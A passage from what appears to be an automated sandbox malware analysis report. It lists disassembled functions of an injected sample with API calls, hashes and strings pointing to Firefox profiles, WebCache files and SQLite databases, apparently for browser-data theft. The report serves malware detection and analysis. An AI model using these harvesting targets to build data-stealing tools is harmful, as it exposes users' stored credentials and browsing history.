                                                                                                                                                                                  • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                                  Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                  • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                  • API String ID: 3510742995-2641926074
                                                                                                                                                                                  • Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                                                                                                                                  • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                  • Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                                                                                                                                  • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                  Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                    • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                    • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                  • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                  • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                  • String ID: $0.@
                                                                                                                                                                                  • API String ID: 2758756878-1896041820
                                                                                                                                                                                  • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                  • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                  • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                  Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000,00000065,?), ref: 004449E7
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2941347001-0
                                                                                                                                                                                  • Opcode ID: bd79a38ac81ee839f20597c7d918221762469afc0d44ed5819b9b85eb8c9be78
                                                                                                                                                                                  • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                  • Opcode Fuzzy Hash: bd79a38ac81ee839f20597c7d918221762469afc0d44ed5819b9b85eb8c9be78
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                  Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404398
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043AC
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043BF
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043D3
                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043E7
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                  • String ID: advapi32.dll
                                                                                                                                                                                  • API String ID: 2012295524-4050573280
                                                                                                                                                                                  • Opcode ID: 4ec369c76c53d9d8d6299e0294e7621cc29ddf3fcf69dbd982a4794b684d00a1
                                                                                                                                                                                  • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ec369c76c53d9d8d6299e0294e7621cc29ddf3fcf69dbd982a4794b684d00a1
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                                                  Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                  • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                    • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                    • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                  • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                  • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                                                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                  • API String ID: 1534475566-1174173950
                                                                                                                                                                                  • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                  • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                  Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 669240632-0
                                                                                                                                                                                  • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                  • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                  • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                  Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,00414C40,?,00000000), ref: 00414BA4
                                                                                                                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                  • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                    • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                  • API String ID: 71295984-2036018995
                                                                                                                                                                                  • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                  • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                  • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                  • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                  Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                  • String ID: "%s"
                                                                                                                                                                                  • API String ID: 1343145685-3297466227
                                                                                                                                                                                  • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                  • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                  • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                  Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessTimes,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CCF
                                                                                                                                                                                  • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                  • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                  • API String ID: 1714573020-3385500049
                                                                                                                                                                                  • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                  • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                  • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                  Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                    • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                  • memset.MSVCRT ref: 00408828
                                                                                                                                                                                  • memset.MSVCRT ref: 00408840
                                                                                                                                                                                  • memset.MSVCRT ref: 00408858
                                                                                                                                                                                  • memset.MSVCRT ref: 00408870
                                                                                                                                                                                  • memset.MSVCRT ref: 00408888
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2911713577-0
                                                                                                                                                                                  • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                  • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                  • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                  Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcmp
                                                                                                                                                                                  • String ID: @ $SQLite format 3
                                                                                                                                                                                  • API String ID: 1475443563-3708268960
                                                                                                                                                                                  • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                  • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                  • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                  Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _wcsicmpqsort
                                                                                                                                                                                  • String ID: /nosort$/sort
                                                                                                                                                                                  • API String ID: 1579243037-1578091866
                                                                                                                                                                                  • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                  • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                  • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                  Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                  • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                  • API String ID: 2887208581-2114579845
                                                                                                                                                                                  • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                  • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                  Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                                                                  • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                  • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                  Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                  • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                  • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                  Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                  • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                  • API String ID: 2221118986-1725073988
                                                                                                                                                                                  • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                  • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                  • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                  Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
